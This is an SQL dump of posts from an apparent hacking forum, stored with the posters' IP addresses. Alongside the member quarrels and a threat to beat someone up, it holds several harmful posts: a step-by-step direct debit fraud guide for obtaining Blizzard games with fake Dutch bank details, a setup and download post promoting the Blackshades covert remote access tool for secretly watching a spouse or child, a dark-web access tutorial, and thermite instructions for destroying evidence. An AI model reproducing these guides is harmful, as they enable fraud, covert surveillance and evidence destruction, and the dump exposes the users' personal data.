`ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3385', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349393677', 'Well right now I don\'t think you deserve staff. You\'re acting really immature right now. You said that we hate you. We never really said that. You just misread our posts. And also, it\'s true. You never really contributed anything. And also, you say that you were going to do a $10 giveaway contest. But then you changed it to $5. And now you changed your mind again and said close it.. What the hell. Are you trying to like spam threads making your post go up or something. Just leave the forum....', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f82af900e4d3e720df3ff6cc91656990', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3386', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349393842', '43. iTziPod is awesome <3', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'dd1cc295d1a24688764ea440c13f463f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3387', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '61', 'NXK', '1349395776', 'You act like you\'re 12 and make 2 different threads to bitch in. No one wants an immature admin.', '99.253.94.204', '1677549260', '1', '0', '61', '1349396549', '1', '0a7cf39f43495c70ff3d9b3d3da8b4ec', '0', '1349396549'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3388', '662', '3387', '7', 'RE: Is this how you treat me?', '0', '203', 'NeonLights', '1349395901', '[quote=\'NXK\' pid=\'3387\' dateline=\'1349395776\'] You act like you\'re 12 and make 2 different threads to bitch in. No one wants an immature admin. [/quote] i simply agree to mister NXK', '67.68.75.193', '1128549313', '1', '0', '61', '1349396611', '1', '311f8267fb9aa1e0a106959209950115', '0', '1349396611'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3389', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349396394', '44. I\'m an iPod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6f1385a1e429383dc9633432f4628053', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3390', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349396437', 'I hope you get repfucked bro.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '581e4e9e96f9264b1ce0cce826c8ffa4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3391', '667', '0', '7', 'can you guys help me spread?', '0', '203', 'NeonLights', '1349400907', 'Edit: removed thread, cuz there might be a fucktard on here... :P', '67.68.75.193', '1128549313', '1', '0', '203', '1349401851', '1', 'fe504229d830441c9f7155b228b83a3a', '0', '1349401851'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3396', '667', '3395', '7', 'RE: can you guys help me spread?', '0', '61', 'NXK', '1349402139', '[quote=\'NeonLights\' pid=\'3395\' dateline=\'1349401816\'] [quote=\'NXK\' pid=\'3392\' dateline=\'1349401140\'] Remove your actual JDB link Now. I\'ve done it for you, don\'t do that again incase a member doesn\'t read OP and actually downloads it by accident [/quote] it doesnt even download anything u need to press execute twice... and if someone is that dumb then be it LMAO il close the thread and removed link [/quote] I removed the link for you.. you didn\'t have to close thread. read lol.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a19a54eeb1a4947c8ddb3f942327f25c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3397', '661', '3303', '50', 'RE: Bullshit', '0', '1', 't3h jok3r', '1349403949', '1. Thanks for making this complaint in the private forum. 2. I pruned the logs yesterday but when I logged off I\'m 100% sure that you were a Staff member. I checked the logs and no one edited your profile, I can provide a screenshot if you would like. [b]Edited[/b] I checked the Moderator log and NXK can verify this. I lifted the ban on your account in other words removed the ban completely. When I unbanned you I originally changed the usergroup which somewhat restricted you from accessing some stuff because the system still thought you were banned so when I completely unbanned you, it auto brought you down to normal members.', '72.231.24.165', '1223104677', '1', '0', '1', '1349404049', '1', '0af093d8f23395eb9062b2150a61b2c8', '0', '1349404049'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3398', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '203', 'NeonLights', '1349404311', 'HOLY FUCK SO I CAN GET CAUGHT? I USE GOOGLE CHROME FOR EVERYTHING EVEN BLACKHAT ACTVITY HOLY FUCK', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'c2d816242701f7ea54f090e6382e0b0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3399', '667', '3391', '7', 'RE: can you guys help me spread?', '0', '1', 't3h jok3r', '1349404503', 'As NXK said, the thread does not need to be closed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '85e5e7c76f8aba4fb1302adf06ef152d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3393', '652', '3366', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349401264', '[quote=\'NeonLights\' pid=\'3366\' dateline=\'1349388628\'] [quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\'] Where do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that.. [/quote] O SNAAAAPPPPPP CAREFUL GUYS!!! HIPSTER TALKING SMACK! lol... u leave in ontario? :D i live not to far from there im in montreal [/quote] I\'m far from hipstir.. lol. where the fuck did you get that idea?', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '40302f9a6d7b33949460999a3a03e096', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3392', '667', '3391', '7', 'RE: can you guys help me spread?', '0', '61', 'NXK', '1349401140', 'Remove your actual JDB link Now. I\'ve done it for you, don\'t do that again incase a member doesn\'t read OP and actually downloads it by accident', '99.253.94.204', '1677549260', '1', '0', '61', '1349401191', '1', '21ebb87bf79907d5a2c5197f19f69a50', '0', '1349401191'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3394', '652', '3393', '7', 'RE: Being CyberBullied', '0', '203', 'NeonLights', '1349401538', '[quote=\'NXK\' pid=\'3393\' dateline=\'1349401264\'] [quote=\'NeonLights\' pid=\'3366\' dateline=\'1349388628\'] [quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\'] Where do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that.. [/quote] O SNAAAAPPPPPP CAREFUL GUYS!!! HIPSTER TALKING SMACK! lol... u leave in ontario? :D i live not to far from there im in montreal [/quote] I\'m far from hipstir.. lol. where the fuck did you get that idea? [/quote] LMAO, idk just messing around hahahah', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '6a33ac8c72caff29407c3143e842fb4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3395', '667', '3392', '7', 'RE: can you guys help me spread?', '0', '203', 'NeonLights', '1349401816', '[quote=\'NXK\' pid=\'3392\' dateline=\'1349401140\'] Remove your actual JDB link Now. I\'ve done it for you, don\'t do that again incase a member doesn\'t read OP and actually downloads it by accident [/quote] it doesnt even download anything u need to press execute twice... and if someone is that dumb then be it LMAO il close the thread and removed link', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '0b34332c0e155949ca1476e24c2fdfa0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3400', '51', '3398', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '1', 't3h jok3r', '1349404729', '[quote=\'NeonLights\' pid=\'3398\' dateline=\'1349404311\'] HOLY FUCK SO I CAN GET CAUGHT? I USE GOOGLE CHROME FOR EVERYTHING EVEN BLACKHAT ACTVITY HOLY FUCK [/quote] Not really but Firefox is good for blackhat stuff and Google Chrome blocks some elements and popouts so stuff such as XSS or SQL Injection can\'t be performed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7a1190adeec73bfecce8d7389d81df44', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3401', '667', '3399', '7', 'RE: can you guys help me spread?', '0', '203', 'NeonLights', '1349405079', '[quote=\'t3h jok3r\' pid=\'3399\' dateline=\'1349404503\'] As NXK said, the thread does not need to be closed. [/quote] its a useless thread why would i leave it here if i cant give the link to my jdb for ppl to spread it... no point on leaving the thread here', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '578de6bc5404b4053af4380ed13f7ca4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3402', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '1', 't3h jok3r', '1349405277', 'Congratulations I promoted you again after the website error but after your constant spamming I have demoted you once again. You are now banned from becoming a Mod, Staff or Admin. If you DDoS LH then I will send a report to your ISP and if you try to use the Skype Resolver on me then it won\'t work because I\'m always on a VPN.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e7db5544589c14b3491141f00b599b39', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3404', '669', '0', '12', 'Hacking: The Art of Exploitation, 2nd Edition', '0', '203', 'NeonLights', '1349405460', 'no longer here threads useless', '67.68.75.193', '1128549313', '1', '0', '203', '1349919470', '1', '1ada9bbe5e3044cee48715c7e4bf046c', '0', '1349919470'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4186', '803', '0', '4', 'bye LH fun knowing u', '2', '203', 'NeonLights', '1349919588', 'bye guys im leaving LH it was a fun journey until some things just snapped im no longer able to login to my skype or this forum without getting pms or message saying im a buttfuck so have fun im gone and i aint gonna change my mind BYE [hr] the disrespect that ppl have these days im leaving a forum no one even cares... i dont even know why i joined this place :\'( i tell ppl im leaving and they auto kick out of there skype chats so fuck it', '67.68.75.160', '1128549280', '1', '0', '1', '1349919789', '1', '234fa9524b7397205d20081bb2597914', '0', '1349919789'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4187', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '1', 't3h jok3r', '1349919731', 'Umm also add this to the OP. [quote=\'NeonLights\'] [quote=\'t3h jok3r\'] [quote=\'NeonLights\'] ok so im already pissed and now i noticed my gourp section is deleted and al my fucking threads that i made also -.- took me for fucking ever to make... [/quote] Guess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it. You want to fucking have attitude then go for it because now ratters will have a new leader. [/quote] fine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this... and there was nothing in that section and its ur fault so dont get moody for shit... [/quote]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '10aafaad1e8d994d813ef167ae4bcf80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4189', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '3', '??????????¢™', '1349919904', 'Your leaving so why should you deserve to be in the group chat? BYE!', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'bf20dbdd80f168de57b68b7155e97131', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4190', '776', '4012', '16', 'RE: What are some things you want SE\'d?', '0', '1', 't3h jok3r', '1349919919', 'There\'s nothing that I want SE\'d at the moment but maybe you can create a guide on SEing phones.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '22bd78176172c219f3bf2bdbe301b33f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4191', '776', '4190', '16', 'RE: What are some things you want SE\'d?', '0', '61', 'NXK', '1349920231', '[quote=\'t3h jok3r\' pid=\'4190\' dateline=\'1349919919\'] There\'s nothing that I want SE\'d at the moment but maybe you can create a guide on SEing phones. [/quote] Hmm I\'ve done this before, ill think about making a guide for this over the weekend.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '00541493760b3ed30b3491c7f70f5bb9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3405', '652', '3342', '7', 'RE: Being CyberBullied', '0', '1', 't3h jok3r', '1349405476', '[quote=\'iTzGRONgamer61\' pid=\'3342\' dateline=\'1349375161\'] [quote=\'NXK\' pid=\'3263\' dateline=\'1349303023\'] Everyones IP\'s are logged on this site It\'s public information. No one can hide. [/quote] I always use a VPN, and if for some reason my main VPN\'s server is down, I have a backup xDDD [/quote] But I have your real IP through Cloudflare remember? LOL don\'t worry I won\'t abuse it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1a878477321ebd447ba7598b5b77c7b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3406', '643', '3333', '7', 'RE: L33thakcers.com members here?', '0', '1', 't3h jok3r', '1349405549', '[quote=\'o_o\' pid=\'3333\' dateline=\'1349363635\'] I thought that this was the l33thackers forum thats why I registered now I just noticed that it isn\'t, I\'ll just stay here and see how it goes [/quote] Hope you like l33thacking. BTW did anyone refer you here or tell you that this is the new l33thackers site?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cf9f4e3e7c1be8f6a81b2e5b34b0438a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3407', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1349405826', 'We\'re on position # 11. Not bad, thanks for all the votes people.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7d5edaef497afd15e4dc66fc47547ae4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3408', '670', '0', '16', '[Guide]How to get free Blizzard games/products.', '0', '5', 'Timmy', '1349407976', 'Hello there, I\'ll be teaching you how to get free Blizzard games or products by a simple method. I don\'t know how long this method will still be working though!!! Alright let\'s get started. We\'ll be using the Direct Debit Fraud method which can be only used on Blizzard products if your Battle.net Account is Dutch. Requirements: • A Battle.net account with the country set as: \'The Netherlands\'. • A brain • A Dutch VPN Then follow me now, do the following steps: • Login into your Battle.net account • Go to the account management (right in the corner where it\'s saying \'Account\'.) • Click buy Digital Games • Pick a game you want to buy (ex: Diablo 3) • Now you\'ll see a payment method called \'Automatische Incasso(Direct Debit)\'. click on it. Now the important things are coming, bank number, bank account etc. • Fill in at \'Bank Name\': \"ING\" without \" • Then as account number something like: \"277863\" If it\'s srated with \"27\" • Then as \'Bank account holder name\' fill in a Dutch name like: \'Moreno Klaas\' it really doesn\'t matter as long it is Dutch. • Then check \'Use my current contact information\' • Click continue. Now you have your game activated and you can play it. Also remember this is fraud, you basicly trick the Blizzard purchasing system. I\'ve tried this method and bought DIABLO 3, I have it 2 months and it hasn\'t been disabled yet, so I don\'t know for how long it will stay as this. I hope you guys enjoy my tutorial, and so no more SEing Blizzard products just do it like this, and feel like a Sir. Thanks for reading!', '72.231.24.165', '1223104677', '1', '0', '5', '1349408002', '1', '25b6510ea701a89ddf31b1c5b3733432', '0', '1349408002'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3409', '672', '0', '30', 'Blackshades NET [Setup + download]', '0', '5', 'Timmy', '1349408107', '[size=medium][color=#A9A9A9]What is Blackshades?[/color][/size] Blackshades is a remote access tool, much like Teamviewer, etc... It allows a user to discretely access multiple other machines remotely and manage them. It provides webcam access, file access, and the ability to monitor keystrokes. Since it allows stealthy access, it allows you to monitor another computer without them knowing. If you want to monitor your child or wife\'s web activity, it\'s perfect. Because of the many features this tool has, it has a history of being used for illegal purposes. I won\'t discuss it\'s illegal uses, purely because I\'m an administrator, but I\'m sure you guys can learn more if you use [url=http://www.Google.com]Google[/url]. [size=medium][color=#A9A9A9]Where can I get Blackshades?[/color][/size] Although many cracks of the software have circulated around, it is notable that they are most likely infected copies. I recommend you purchase the software from the developers at [url=http://www.bshades.eu]Bshades.eu[/url] since the files won\'t be infected, and you can feel warm and fuzzy about helping them out. I won\'t give links to any cracks, but I\'m sure you can find one if you look around enough. It will almost definitely be infected though. You can also use the Lite version offered on their site, but it has limitations. The software from [url=http://www.bshades.eu]Bshades.eu[/url] is ~$50.00 USD, which isn\'t much considering what you can gain. [color=#A9A9A9][size=medium]Setting it up, Part I[/size] (by [url=http://www.youtube.com/user/LegitSezmic]LegitSezmic[/url])[/color][video=youtube]http://www.youtube.com/watch?v=H9eQkO2StnA[/video] [color=#A9A9A9][size=medium]Setting it up, Part II[/size] (by [url=http://www.youtube.com/user/LegitSezmic]LegitSezmic[/url])[/color][video=youtube]http://www.youtube.com/watch?v=3T2Q_ctHCDk[/video] [b]Edited[/b] Download: http://l33thacking.net/thread-142.html Scan before running file.', '72.231.24.165', '1223104677', '1', '0', '5', '1349408180', '1', '26407c9ca92069444d4933c57eacfc5e', '0', '1349408180'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3410', '673', '0', '29', 'The only allowed \"how to deep web\" tutorial here.', '0', '5', 'Timmy', '1349408360', 'Hi everyone, Some of you may and some of you may not have heard of the \"Dark Web\" or \"Deep Web\", there are many names for it, but basically the Dark Web is a place for hackers, drug dealers, and pretty much everything illegal can be discussed or sold on here. [u][b]Here are some facts on The Deep Web:[/b][/u] [color=#FFD700] - Public information on the deep Web is currently 400 to 550 times larger than the commonly defined World Wide Web. - The deep Web contains 7,500 terabytes of information compared to 19 terabytes of information in the surface Web. - The deep Web contains nearly 550 billion individual documents compared to the 1 billion of the surface Web.[/color] [u][b]What can you do on the Dark Web?[/b][/u] [color=#FFD700][list] [*]Hire Killers [*]Pay into Fixed betting events [*]Hire a hacker [*]Use anonymous email services [*]Buy and Sell Drugs [*]Buy and Sell Weapons and much more! [/list][/color] Now after reading about just SOME of the things you can access on the Dark Web, you may be asking. Is it safe?. The answer to that really depends on what you define as safe, if you mean safe as in will you get into trouble for going onto the Dark Web? No you wont; you are allowed to do this, but purchasing illegal items such as Drugs or downloading CP could increase your chances of being arrested. Although what you may all like to hear is that Tor is anonymous and it is very hard to be traced on Tor. Tor is not only used to access the Dark Web, it can be used to access sites like thepiratebay.se which many UK ISPs have blocked, but if you go through Tor you can connect. For information on how [u]Tor[/u] works you can go [url=https://www.torproject.org/about/overview.html.en#stayinganonymous]Here[/url] For more information on the [u]Dark Web[/u] you can go [url=http://en.wikipedia.org/wiki/Deep_web]Here[/url] [u][b]How to access it?[/b][/u] [list=1] [color=#FFD700][*]You need to download a Tor Browser which you can get [url=https://www.torproject.org/download/download-easy.html.en]Here[/url] [*]Once downloaded you will need to \"Start Tor\", you will then be connected to the Tor Network and will be able to access .onion links [*]In the address bar copy and paste this URL --> kpvz7ki2v5agwt35.onion [*]Thats it, you are now on the home page of the hidden Wiki. I will leave the rest to you to decide what you do next. Enjoy[/color] [/list] [i][b][color=#FF0000]Disclaimer: I am not responsible for what you do on the Dark Web. I have provided this tutorial for educational purposes only.[/color][/b][/i] This tutorial belongs to EquinoxRhyme', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '37de5c0743501832001c6873f7732bdd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3411', '584', '2846', '24', 'RE: Windows 8, will you switch over?', '0', '9', 'p420', '1349408547', 'What are the new and cool stuff in windows 9?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e01c8dabbfafc9023b5a656b8f0f5013', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3412', '674', '0', '24', 'Oh NO! Learn how to destroy your hard drive completely', '0', '9', 'p420', '1349408586', '[align=center][color=#FF4500][size=x-large]How to FULLY Destroy a Hard Drive[/size][/color][/align] [align=center][color=#1E90FF][b]By BaneKitty[/b][/color][/align] [align=left][color=#1E90FF]The day may come when you need to destroy your hard drive, sadly. No matter what people say, the government HAS to have ways of getting your information off your hard drive. Whether it\'s brute forcing with a NSA supercomputer, or just simply using some l33t tool that only the government has, they get information off of computers. By the way, this isn\'t my idea, but I\'m adding some things onto the previous guys idea on another forum. In the event this does happen, and you hear knocking on your front door, you need to do something with your hard drive. You can smash your hard drive with a hammer, dump it in water, hell, even boil it. But, data can be pulled off of it. So, here is a method 100% working to successfully destroy your hard drive. It will always work. What we\'re going to do is basically turn it into a liquid metal with thermite. DO THIS OUTSIDE OF A BUILDING! Thermite isn\'t able to be put out once ignited, plain and simple. This also means that once it starts burning, if you get any body part in it, say goodbye to that body part. You need a brain for this. The most important part is do not panic or rush. If you panic or rush, you may make mistakes. Worst thing you can do is light yourself on fire. [size=large][align=center][color=#FF4500]Ingredients needed:[/color][/align][/size] [align=center][list] [*]Flower pot (medium sized for one hard drive) [*]Powdered iron oxide [*]Powdered aluminum [*]Magnesium strip OR blowtorch [*]Matches [/list][/align] These materials are widely available, I recommend buying online and sending it to a drop house though. That\'s just me personally, you don\'t want to FBI to know you have those materials and SWAT you so you don\'t have time to burn shit. Flower pot is what you\'re going to stick it all in. The iron oxide must be powdered. Same for the aluminum. [size=large][align=center][color=#FF4500]Instructions:[/color][/align][/size] [align=center]1. Take 8 grams of powdered aluminum to every 3 grams of powdered iron oxide together in a flower pot. 2. Do step one until your flower pot is full. 3. Stick your hard drive in the middle of this mixture. 4. Stick the magnesium strip in the mixture so that half is protruding out. 5. Light the magnesium strip with matches. 6. Run. No joke. Run.[/align] [align=center][color=#FF4500]OR if you have a blowtorch:[/color][/align] [align=center]1. Take 8 grams of powdered aluminum to every 3 grams of powdered iron oxide together in a flower pot. 2. Do step one until your flower pot is full. 3. Stick your hard drive in the middle of this mixture. 4. Stick the magnesium strip in the mixture so that half is protruding out. 5. Light the magnesium strip with your blow torch. 6. Run. No joke. Run.[/align] Good luck guys, hopefully this situation will never happen to any of us, but if it does, you\'re prepared. Wiping takes a long time, encryption is good, but destruction is perfect. [i][color=#FF4500][align=center]Perfection is key, men. [/align][/color][/i] [/color][/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '9c3dfed488b5db7a5c9cf4ca56c8c177', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3413', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '10', 'swa4567', '1349409088', 'They have the same theme and similar URL so people think it\'s the same forum.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1b7fa6b6e3ef93719f53f9c88c7c48c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3414', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '10', 'swa4567', '1349409168', 'After this thread you have clarified that you don\'t respect LH and neither the admin (Jok3r) otherwise you would have PM\'d him or created a thread in the complaints forum.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '845456b56e728e25b046567d5efd0022', '0', 